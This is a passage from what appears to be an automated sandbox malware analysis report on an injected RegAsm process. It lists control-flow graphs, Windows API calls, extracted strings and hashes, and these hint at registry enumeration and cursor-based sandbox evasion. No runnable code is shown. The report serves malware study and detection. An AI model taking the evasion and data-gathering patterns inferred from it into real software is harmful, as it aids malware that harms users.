                                                                                                                                                                                                                                  control_flow_graph 4599 433be0-433d89 call 5672b0 * 2 call 41fb00 call 5672b0 call 567190 4611 434975-434996 call 41b910 4599->4611 4612 433d8f 4599->4612 4618 43499c-4349ac 4611->4618 4613 433da3-433e45 call 5672b0 * 3 call 567190 call 41fbd0 4612->4613 4614 433d91-433d9d 4612->4614 4634 433e50-433e54 4613->4634 4614->4611 4614->4613 4618->4618 4620 4349ae-4349d9 call 41a1e0 call 417140 4618->4620 4630 4349dc-4349e2 4620->4630 4635 433e56-433e8b 4634->4635 4636 433e8d-433edb call 41b910 4634->4636 4635->4634 4640 433ee1-433ef1 4636->4640 4640->4640 4641 433ef3-434045 call 41a1e0 call 410820 call 4150c0 * 2 call 410ec0 call 4f4760 call 5672b0 * 2 call 41fb00 4640->4641 4660 43404b 4641->4660 4661 43494f-434970 call 417140 call 414930 call 434ae0 4641->4661 4663 43405f-43409d call 42c510 4660->4663 4664 43404d-434059 4660->4664 4661->4611 4670 4340a8-4340ac 4663->4670 4664->4661 4664->4663 4671 4340e5-43412e call 4187e0 4670->4671 4672 4340ae-4340e3 4670->4672 4678 434130-434144 call 53f1aa 4671->4678 4679 43416a-434182 4671->4679 4672->4670 4678->4679 4688 434146-434167 call 41f450 call 53f0da call 53f159 4678->4688 4680 4341d4-4341d9 call 4ee6c0 4679->4680 4681 434184-4341d2 call 4fb3b0 call 4f57c0 4679->4681 4687 4341de-434214 call 41b910 call 417560 call 53ee6e 4680->4687 4681->4687 4703 434223 4687->4703 4704 434216-434221 call 4338e0 4687->4704 4688->4679 4705 43422a-434251 call 434a40 4703->4705 4704->4705 4710 43425c-434260 4705->4710 4711 434262-43429f 4710->4711 4712 4342a1-4342e6 call 4349f0 4710->4712 4711->4710 4716 4342f1-4342f5 4712->4716 4717 4342f7-434334 4716->4717 4718 434336-43451a call 4187e0 call 5672b0 * 2 call 41fb00 call 5672b0 call 567190 call 41b910 4716->4718 4717->4716 4734 434520-434533 4718->4734 4734->4734 4735 434535-434587 call 4f5c80 call 4150c0 4734->4735 4740 43458d-43459d 4735->4740 4740->4740 4741 43459f-434629 call 417380 call 414f60 call 509bd0 call 417140 call 414fd0 4740->4741 4752 434660-434668 call 41bb40 4741->4752 4753 43462b-434632 4741->4753 4758 43466d-434674 4752->4758 4754 434634-43463b 4753->4754 4755 43463d 4753->4755 4757 434644-43464a 4754->4757 4755->4757 4757->4752 4759 43464c-43465e call 414e70 4757->4759 4760 434682 4758->4760 4761 434676-434680 4758->4761 4759->4758 4763 43468c-434695 4760->4763 4761->4763 4765 434697-4346b1 call 4ef210 4763->4765 4766 4346ef-43470d call 417140 4763->4766 4773 4346b7-4346c7 4765->4773 4771 434713-434740 call 4150c0 * 2 call 411340 4766->4771 4772 434831-434854 call 414fd0 4766->4772 4792 434745-4347a2 call 4f4760 4771->4792 4781 434856-43485d 4772->4781 4782 434894-43489c call 41bb40 4772->4782 4773->4773 4774 4346c9-4346ea call 4172e0 4773->4774 4774->4766 4785 43486b 4781->4785 4786 43485f-434869 4781->4786 4787 4348a1-4348a8 4782->4787 4789 434875-43487e 4785->4789 4786->4789 4790 4348b6 4787->4790 4791 4348aa-4348b4 4787->4791 4789->4782 4793 434880-434892 call 414e70 4789->4793 4794 4348c0-4348c9 4790->4794 4791->4794 4803 4347a4-434816 call 414f60 call 417140 call 414930 call 417140 * 4 call 414930 call 434ae0 call 417140 4792->4803 4804 43481b-43482c call 417140 call 414930 4792->4804 4793->4787 4798 434923-43494a call 417140 * 4 4794->4798 4799 4348cb-4348e5 call 4ef210 4794->4799 4798->4661 4812 4348eb-4348fb 4799->4812 4803->4630 4804->4772 4812->4812 4816 4348fd-43491e call 4172e0 4812->4816 4816->4798
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: =Y\I\$Content-Type: application/x-www-form-urlencoded$TUT$eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 3732870572-2210028155
                                                                                                                                                                                                                                  • Opcode ID: 96fe91a0ed78ec9aa1d653453e9a783f4822c719dd6f6070e5b24c0925f68d86
                                                                                                                                                                                                                                  • Instruction ID: 0b39270c4957e3cb2ade4fb35155ac2488cd6917109384145b6ef13c4b05bb98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96fe91a0ed78ec9aa1d653453e9a783f4822c719dd6f6070e5b24c0925f68d86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60924670D002289FDB24DB69CC95BDEBBB5BF89304F1081DAE409A7291DB346E85CF55
                                                                                                                                                                                                                                  Function 00481580 Relevance: 14.9, APIs: 2, Strings: 5, Instructions: 2639COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: %$&$'$)$3
                                                                                                                                                                                                                                  • API String ID: 3732870572-1175896778
                                                                                                                                                                                                                                  • Opcode ID: 0309f95802aa652044dd323fa11826f2754696fd61fe0153700ac664dcf76bd3
                                                                                                                                                                                                                                  • Instruction ID: 0034d643212e722d0324f47abe3d7b7ddad9cd6a29112c5330de8d3d63963a63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0309f95802aa652044dd323fa11826f2754696fd61fe0153700ac664dcf76bd3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0753F270D052688FCB25DB28CC91BEEBBB5BF89308F0481DAD549A7252DB346E85CF54
                                                                                                                                                                                                                                  Function 0047EB60 Relevance: 14.0, APIs: 2, Strings: 5, Instructions: 1747COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 5479 47eb60-47eb93 call 41f450 call 480960 5484 47eba4-47ebab 5479->5484 5485 47ebf2-47ec42 call 41b910 5484->5485 5486 47ebad-47ebf0 5484->5486 5490 47ec48-47ec58 5485->5490 5486->5484 5490->5490 5491 47ec5a-47edff call 41a1e0 call 4f5470 call 417140 call 541c00 call 5672b0 call 567190 call 442850 5490->5491 5507 47ee0a-47ee0e 5491->5507 5508 47ee10-47ee4d 5507->5508 5509 47ee4f-47eea8 call 41b910 5507->5509 5508->5507 5513 47eeae-47eebe 5509->5513 5513->5513 5514 47eec0-47ef3f call 41a1e0 call 442970 5513->5514 5520 47ef45-47ef84 call 4809d0 5514->5520 5521 47f2b1-47f2cf call 480b10 5514->5521 5527 47ef8f-47ef93 5520->5527 5526 47f2da-47f2de 5521->5526 5528 47f2e0-47f31d 5526->5528 5529 47f31f-47f378 call 41b910 5526->5529 5530 47ef95-47efd2 5527->5530 5531 47efd4-47f024 call 41b910 5527->5531 5528->5526 5538 47f37e-47f38e 5529->5538 5530->5527 5539 47f02a-47f03a 5531->5539 5538->5538 5540 47f390-47f40f call 41a1e0 call 442970 5538->5540 5539->5539 5541 47f03c-47f073 call 41a1e0 5539->5541 5553 47f415-47f454 call 480c40 5540->5553 5554 47f7e0-47f804 call 480d90 5540->5554 5547 47f079-47f089 5541->5547 5547->5547 5549 47f08b-47f11f call 4f89a0 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 480aa0 5547->5549 5597 47f12a-47f12e 5549->5597 5562 47f45f-47f463 5553->5562 5561 47f815-47f81c 5554->5561 5564 47f81e-47f86a 5561->5564 5565 47f86c-47f8d1 call 41b910 5561->5565 5566 47f465-47f4a2 5562->5566 5567 47f4a4-47f4fa call 41b910 5562->5567 5564->5561 5577 47f8d7-47f8ed 5565->5577 5566->5562 5578 47f500-47f516 5567->5578 5577->5577 5580 47f8ef-47f971 call 41a1e0 call 442970 5577->5580 5578->5578 5581 47f518-47f558 call 41a1e0 5578->5581 5600 47f977-47f9bc call 480f20 5580->5600 5601 47fd71-47fd95 call 4810c0 5580->5601 5590 47f55e-47f574 5581->5590 5590->5590 5593 47f576-47f613 call 4f89a0 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 480d20 5590->5593 5663 47f624-47f62b 5593->5663 5598 47f130-47f16d 5597->5598 5599 47f16f-47f1b0 call 4186f0 call 440f20 5597->5599 5598->5597 5621 47f1b5-47f1cb 5599->5621 5612 47f9cd-47f9d4 5600->5612 5613 47fda6-47fdad 5601->5613 5616 47f9d6-47fa22 5612->5616 5617 47fa24-47fa80 call 41b910 5612->5617 5619 47fdaf-47fdfb 5613->5619 5620 47fdfd-47fe62 call 41b910 5613->5620 5616->5612 5635 47fa86-47fa9c 5617->5635 5619->5613 5636 47fe68-47fe7e 5620->5636 5627 47f296-47f2ac call 417140 * 2 5621->5627 5628 47f1d1-47f1d8 5621->5628 5627->5521 5632 47f1e3-47f208 5628->5632 5632->5627 5637 47f20e-47f240 call 4ef150 5632->5637 5635->5635 5640 47fa9e-47fade call 41a1e0 5635->5640 5636->5636 5641 47fe80-47ff02 call 41a1e0 call 442970 5636->5641 5652 47f242-47f28c call 4150c0 call 417140 * 2 call 4f2110 * 2 5637->5652 5653 47f291 5637->5653 5656 47fae4-47fafa 5640->5656 5671 48030d-480488 call 541c00 call 5672b0 call 567190 call 414fd0 call 481360 5641->5671 5672 47ff08-47ff4d call 481200 5641->5672 5711 48095a-48095e 5652->5711 5653->5632 5656->5656 5660 47fafc-47fb99 call 4f89a0 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 481050 5656->5660 5737 47fbaa-47fbb1 5660->5737 5668 47f62d-47f679 5663->5668 5669 47f67b-47f6dd call 4186f0 call 440f20 5663->5669 5668->5663 5696 47f7c5-47f7cb call 417140 5669->5696 5697 47f6e3-47f6ed 5669->5697 5740 480499-4804a0 5671->5740 5686 47ff5e-47ff65 5672->5686 5691 47ff67-47ffb3 5686->5691 5692 47ffb5-480011 call 41b910 5686->5692 5691->5686 5710 480017-48002d 5692->5710 5712 47f7d0-47f7db call 417140 5696->5712 5703 47f6fe-47f726 5697->5703 5703->5696 5709 47f72c-47f761 call 4ef150 5703->5709 5724 47f763-47f7bb call 4150c0 call 417140 * 2 call 4f2110 * 3 5709->5724 5725 47f7c0 5709->5725 5710->5710 5715 48002f-48006f call 41a1e0 5710->5715 5712->5554 5731 480075-48008b 5715->5731 5724->5711 5725->5703 5731->5731 5735 48008d-48012a call 4f89a0 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 4812f0 5731->5735 5815 48013b-480142 5735->5815 5743 47fbb3-47fbff 5737->5743 5744 47fc01-47fc63 call 4186f0 call 440f20 5737->5744 5741 4804f0-48052b call 4ef0b0 5740->5741 5742 4804a2-4804ee 5740->5742 5760 480531-480555 call 4813c0 5741->5760 5761 480616-48063a call 481420 5741->5761 5742->5740 5743->5737 5767 47fd56-47fd6c call 417140 * 2 5744->5767 5768 47fc69-47fc73 5744->5768 5777 480566-48056d 5760->5777 5775 48064b-480652 5761->5775 5767->5601 5773 47fc84-47fcac 5768->5773 5773->5767 5780 47fcb2-47fce7 call 4ef150 5773->5780 5781 4806a2-4806ef call 4186f0 call 414d00 call 42c670 5775->5781 5782 480654-4806a0 5775->5782 5784 4805bd-480611 call 414fd0 call 414e70 call 417140 5777->5784 5785 48056f-4805bb 5777->5785 5800 47fd51 5780->5800 5801 47fce9-47fd4c call 4150c0 call 417140 * 2 call 4f2110 * 4 5780->5801 5816 4806f4-4806f9 5781->5816 5782->5775 5784->5761 5785->5777 5800->5773 5801->5711 5818 480192-4801f4 call 4186f0 call 440f20 5815->5818 5819 480144-480190 5815->5819 5820 4806ff-480723 call 481510 5816->5820 5821 480900-480957 call 414fd0 call 417140 * 2 call 4f2110 * 5 5816->5821 5842 4801fa-480204 5818->5842 5843 4802f2-480308 call 417140 * 2 5818->5843 5819->5815 5831 480734-48073b 5820->5831 5821->5711 5836 48078b-4807ed call 4186f0 call 440f20 5831->5836 5837 48073d-480789 5831->5837 5863 4807f3-4807fd 5836->5863 5864 4808f5-4808fb call 417140 5836->5864 5837->5831 5847 480215-48023d 5842->5847 5843->5671 5847->5843 5852 480243-480278 call 4ef150 5847->5852 5869 48027a-4802e8 call 4150c0 call 417140 * 2 call 4f2110 * 5 5852->5869 5870 4802ed 5852->5870 5871 48080e-480838 5863->5871 5864->5821 5869->5711 5870->5847 5871->5864 5875 48083e-480873 call 4ef150 5871->5875 5885 4808f0 5875->5885 5886 480875-4808ee call 4150c0 call 417140 * 3 call 4f2110 * 5 5875->5886 5885->5871 5886->5711
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: %$&$'$)$3
                                                                                                                                                                                                                                  • API String ID: 3732870572-1175896778
                                                                                                                                                                                                                                  • Opcode ID: dfb1846fb410fce2d0f3ec7992ef31c330d7a99f4678bf6e897381acb73f8dfc
                                                                                                                                                                                                                                  • Instruction ID: 76545cefedcf0f882da335e4038d0771dff4b3793334e29289a3aa2004b31255
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfb1846fb410fce2d0f3ec7992ef31c330d7a99f4678bf6e897381acb73f8dfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD13F370D052688FCB29DB68CC91BEDBBB5BF49304F0481DAD50AA7252DB346E85CF58
                                                                                                                                                                                                                                  Function 00442970 Relevance: 11.3, APIs: 4, Strings: 2, Instructions: 789registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 5957 442970-442996 5958 4429d2-4429ea 5957->5958 5959 442998-4429ac call 53f1aa 5957->5959 5960 442a3c-442a41 call 4ee6c0 5958->5960 5961 4429ec-442a3a call 4fb3b0 call 4f57c0 5958->5961 5959->5958 5968 4429ae-4429cf call 41f450 call 53f0da call 53f159 5959->5968 5967 442a46-442a77 call 41f450 call 414fd0 5960->5967 5961->5967 5979 442aae-442ab6 call 41bb40 5967->5979 5980 442a79-442a80 5967->5980 5968->5958 5987 442abb-442ac2 5979->5987 5982 442a82-442a89 5980->5982 5983 442a8b 5980->5983 5986 442a92-442a98 5982->5986 5983->5986 5986->5979 5988 442a9a-442aac call 414e70 5986->5988 5989 442ac4-442acb 5987->5989 5990 442acd 5987->5990 5988->5987 5992 442ad4-442ada 5989->5992 5990->5992 5994 442b34-442d14 call 417140 call 5672b0 call 567190 call 414d00 call 5672b0 * 2 call 41fb00 RegOpenKeyExA 5992->5994 5995 442adc-442af6 call 4ef210 5992->5995 6015 4434ef-443513 call 41b910 5994->6015 6016 442d1a-442d26 5994->6016 6000 442afc-442b0c 5995->6000 6000->6000 6002 442b0e-442b2f call 4172e0 6000->6002 6002->5994 6022 443519-443529 6015->6022 6016->6015 6017 442d2c-442d4f call 414fd0 6016->6017 6023 442d86-442d8e call 41bb40 6017->6023 6024 442d51-442d58 6017->6024 6022->6022 6025 44352b-443564 call 41a1e0 6022->6025 6030 442d93-442d9a 6023->6030 6026 442d63 6024->6026 6027 442d5a-442d61 6024->6027 6036 4435a4-4435ac call 41bb40 6025->6036 6037 443566-44356d 6025->6037 6031 442d6a-442d70 6026->6031 6027->6031 6033 442da5 6030->6033 6034 442d9c-442da3 6030->6034 6031->6023 6035 442d72-442d84 call 414e70 6031->6035 6038 442dac-442db2 6033->6038 6034->6038 6035->6030 6045 4435b1-4435b8 6036->6045 6041 44356f-443579 6037->6041 6042 44357b 6037->6042 6043 442db4-442dce call 4ef210 6038->6043 6044 442e0c-442e73 call 417140 RegEnumKeyExA 6038->6044 6047 443585-44358e 6041->6047 6042->6047 6058 442dd4-442de4 6043->6058 6064 442e75 6044->6064 6065 442e7a-442e9c call 443650 6044->6065 6049 4435c6 6045->6049 6050 4435ba-4435c4 6045->6050 6047->6036 6052 443590-4435a2 call 414e70 6047->6052 6055 4435d0-4435d9 6049->6055 6050->6055 6052->6045 6059 443633-44364e call 417140 * 2 6055->6059 6060 4435db-4435f5 call 4ef210 6055->6060 6058->6058 6062 442de6-442e07 call 4172e0 6058->6062 6075 4435fb-44360b 6060->6075 6062->6044 6071 4432b1-4432d5 call 41b910 6064->6071 6076 442ea7-442eab 6065->6076 6082 4432db-4432eb 6071->6082 6075->6075 6079 44360d-44362e call 4172e0 6075->6079 6080 442eec-442f36 call 41b910 6076->6080 6081 442ead-442eea 6076->6081 6079->6059 6089 442f3c-442f4c 6080->6089 6081->6076 6082->6082 6086 4432ed-443326 call 41a1e0 6082->6086 6092 443366-44336e call 41bb40 6086->6092 6093 443328-44332f 6086->6093 6089->6089 6091 442f4e-442fa9 call 41a1e0 call 41b910 6089->6091 6111 442faf-442fbf 6091->6111 6098 443373-44337a 6092->6098 6096 443331-44333b 6093->6096 6097 44333d 6093->6097 6100 443347-443350 6096->6100 6097->6100 6101 44337c-443386 6098->6101 6102 443388 6098->6102 6100->6092 6104 443352-443364 call 414e70 6100->6104 6106 443392-44339b 6101->6106 6102->6106 6104->6098 6109 4433f5-443414 call 417140 6106->6109 6110 44339d-4433b7 call 4ef210 6106->6110 6118 443416-44342a call 53f1aa 6109->6118 6119 443450-443471 6109->6119 6121 4433bd-4433cd 6110->6121 6111->6111 6114 442fc1-443010 call 41a1e0 call 4f4730 6111->6114 6134 443016-443038 call 4436d0 6114->6134 6135 4431b7 6114->6135 6118->6119 6133 44342c-44344d call 41f450 call 53f0da call 53f159 6118->6133 6124 443473-4434ca call 4fb3b0 call 4f57c0 6119->6124 6125 4434cc-4434d1 call 4ee6c0 6119->6125 6121->6121 6126 4433cf-4433f0 call 4172e0 6121->6126 6132 4434d6-4434e9 RegCloseKey 6124->6132 6125->6132 6126->6109 6132->6015 6133->6119 6147 443043-443047 6134->6147 6139 4431be-4431ca 6135->6139 6144 4431cc-4431d6 call 417140 6139->6144 6145 4431db-4431e1 6139->6145 6144->6145 6149 4431f2-4431f8 6145->6149 6150 4431e3-4431ed call 417140 6145->6150 6155 443088-4430d2 call 41b910 6147->6155 6156 443049-443086 6147->6156 6152 443209-44320f 6149->6152 6153 4431fa-443204 call 417140 6149->6153 6150->6149 6158 443220-443226 6152->6158 6159 443211-44321b call 417140 6152->6159 6153->6152 6169 4430d8-4430e8 6155->6169 6156->6147 6164 4432ac 6158->6164 6165 44322c-443252 call 41b910 6158->6165 6159->6158 6164->6071 6172 443258-443268 6165->6172 6169->6169 6171 4430ea-443145 call 41a1e0 call 41b910 6169->6171 6180 44314b-44315b 6171->6180 6172->6172 6175 44326a-4432a7 call 41a1e0 call 4f5470 call 417140 6172->6175 6175->6164 6180->6180 6183 44315d-4431ac call 41a1e0 call 4f4730 6180->6183 6183->6135 6189 4431ae-4431b5 6183->6189 6189->6139
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00442C37
                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000000,eks), ref: 00442E60
                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,?,?), ref: 00442CE9
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease$ConditionEnumOpenVariableWake__aulldiv
                                                                                                                                                                                                                                  • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 2427947366-388657971
                                                                                                                                                                                                                                  • Opcode ID: 3f0675bb4c535833c6f468245dbea5e839bf6a7e5b26bdd6d05c683e3aad7e6f
                                                                                                                                                                                                                                  • Instruction ID: 08fac814bacb05f198c375bebecb25a3a60c5f102c261e7047808d5fa7220acc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f0675bb4c535833c6f468245dbea5e839bf6a7e5b26bdd6d05c683e3aad7e6f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE822270D042289FEB24CFA5C995BEEBBB1BF49304F1081DAE509A7281DB746E85CF54
                                                                                                                                                                                                                                  Function 00440F20 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 393COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 6190 440f20-440f40 6191 440f42-440f56 call 53f1aa 6190->6191 6192 440f7c-440f94 6190->6192 6191->6192 6201 440f58-440f79 call 41f450 call 53f0da call 53f159 6191->6201 6193 440f96-440fde call 4fb3b0 call 4f57c0 6192->6193 6194 440fe0-440fe5 call 4ee6c0 6192->6194 6200 440fea-441005 call 41b910 6193->6200 6194->6200 6208 441008-441018 6200->6208 6201->6192 6208->6208 6210 44101a-441059 call 41a1e0 6208->6210 6216 441064-441068 6210->6216 6217 441095-4410d2 call 414d00 call 54f78c 6216->6217 6218 44106a-441093 6216->6218 6224 441463-441474 call 417140 6217->6224 6225 4410d8-441307 call 5672b0 * 2 call 41fb00 call 54fc1b call 54f66e call 5672b0 call 567190 call 5672b0 * 3 call 567190 call 41fbd0 call 54fc1b call 41b910 6217->6225 6218->6216 6256 44130a-44131a 6225->6256 6256->6256 6257 44131c-441346 call 41a1e0 6256->6257 6260 44137d-441385 call 41bb40 6257->6260 6261 441348-44134f 6257->6261 6265 44138a-441391 6260->6265 6262 441351-441358 6261->6262 6263 44135a 6261->6263 6266 441361-441367 6262->6266 6263->6266 6267 441393-44139a 6265->6267 6268 44139c 6265->6268 6266->6260 6269 441369-44137b call 414e70 6266->6269 6270 4413a3-4413a9 6267->6270 6268->6270 6269->6265 6272 4413f7-441411 call 417140 6270->6272 6273 4413ab-4413c5 call 4ef210 6270->6273 6280 441421-44142d call 41bba0 6272->6280 6281 441413-44141f call 41bb40 6272->6281 6279 4413c8-4413d8 6273->6279 6279->6279 6283 4413da-4413f2 call 4172e0 6279->6283 6285 441432-44145b call 414d00 call 55012d call 54f8c8 6280->6285 6281->6285 6283->6272 6293 441460 6285->6293 6293->6224
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00441245
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004412B9
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                  • __fread_nolock.LIBCMT ref: 0044144F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExclusiveLock__aulldiv$AcquireRelease$ConditionVariableWake__fread_nolock
                                                                                                                                                                                                                                  • String ID: "P@$eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 577242060-2889650871
                                                                                                                                                                                                                                  • Opcode ID: 88a21bc0bd6572afdedf39331dd302007d51b9a2b7114fd5d74510ff3bf516f9
                                                                                                                                                                                                                                  • Instruction ID: 8ab3c6f68b34b0ba270dd6dfddb089e98b0f822792d892a9adaacf0b1e0c687c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88a21bc0bd6572afdedf39331dd302007d51b9a2b7114fd5d74510ff3bf516f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AF16C71E002189FEB14DFA4DC51BEEBBB1BF88304F14819AE509A7351D7346A85CF65
                                                                                                                                                                                                                                  Function 00433130 Relevance: 9.3, APIs: 6, Instructions: 343sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 6294 433130-433143 GetCursorPos 6295 433149-433150 6294->6295 6296 433156-433169 GetCursorPos 6295->6296 6297 4335ed 6295->6297 6298 43342f-433460 GetPEB 6296->6298 6299 43316f-433178 6296->6299 6300 4335ef-4335f5 6297->6300 6302 433463-4334b2 6298->6302 6299->6298 6301 43317e-4331a6 GetPEB 6299->6301 6303 4331a9-4331f8 6301->6303 6304 4334b4-4334bb 6302->6304 6305 4334bd 6302->6305 6306 433203 6303->6306 6307 4331fa-433201 6303->6307 6308 4334c4-4334ca 6304->6308 6305->6308 6309 43320a-433210 6306->6309 6307->6309 6310 4334d0-4334d6 6308->6310 6311 4335aa-4335c5 6308->6311 6313 433216-43321c 6309->6313 6314 4332e4-4332f9 6309->6314 6315 4334d9-4334f2 6310->6315 6311->6302 6312 4335cb 6311->6312 6317 4335d2-4335e8 Sleep 6312->6317 6318 43321f-433232 6313->6318 6314->6303 6316 4332ff 6314->6316 6315->6311 6319 4334f8-433519 6315->6319 6320 433306-433329 Sleep GetCursorPos 6316->6320 6317->6295 6318->6314 6321 433238-433253 6318->6321 6322 433520-43353d 6319->6322 6320->6298 6325 43332f-433338 6320->6325 6326 43325a-433277 6321->6326 6323 43354a-43355b 6322->6323 6324 43353f-433567 6322->6324 6323->6322 6331 4335a5 6324->6331 6332 433569-4335a3 6324->6332 6325->6298 6328 43333e-43342a call 5672b0 * 2 call 41fb00 call 5672b0 * 3 call 567190 call 41fbd0 6325->6328 6329 433284-433295 6326->6329 6330 433279-4332a1 6326->6330 6328->6300 6329->6326 6335 4332a3-4332dd 6330->6335 6336 4332df 6330->6336 6331->6315 6332->6317 6335->6320 6336->6318
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
